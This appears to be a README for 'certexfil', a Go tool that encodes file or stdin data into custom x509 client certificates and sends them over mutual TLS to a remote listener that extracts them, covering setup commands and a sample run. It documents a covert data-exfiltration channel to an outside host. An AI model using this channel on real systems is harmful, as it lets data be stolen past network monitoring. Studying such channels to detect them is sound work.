This project represents my initial venture into the Go programming language, focusing on data exfiltration techniques and their countermeasures. The primary goal is to develop a fun way to hide data by encoding a payload into a custom x509 digital certificate by reading from a file.

For an in-depth discussion on the topic, refer to my Medium article: Abusing Certificates for Data Exfiltration.

For those unfamiliar with the concepts of certificates and mutual TLS (mTLS), I recommend the following resources for a thorough understanding:

• TLS, X509, and Mutual Authentication Explained
• A Step-by-Step Guide to mTLS in Go

Certexfil operates in three modes: CA generation, client, and listener.

• --ca initializes a CA for certificate creation and authentication.
• --payload incorporates a file payload into a new client certificate for mTLS with a listener service.
• --listen launches a service that validates mTLS clients and extracts embedded payloads.

To create server_cert.pem and server_key.pem for mTLS:

somewhere$ certexfil -ca -ecdsa-curve P521 --host remote.host.com

Ensure the certexfil binary and ./CERTS directory are on your remote server. Then, initiate the mTLS listener:

remoteserver$ ./certexfil --listen

Embedding output as a payload:

06:46:00 jma@wintermute Go-Workspace → echo 'w00t w00t' | certexfil --host remote.server.com  --payload -
2019/05/31 18:48:27 [*] Reading from stdin..
2019/05/31 18:48:27 [D] Payload (raw)  --> w00t w00t...	(9 bytes)
2019/05/31 18:48:27 [D] Payload (Prepare()) --> �...		(31 bytes)
2019/05/31 18:48:27 [*] Generated custom cert with payload
Oo

• @Sourcefrenchy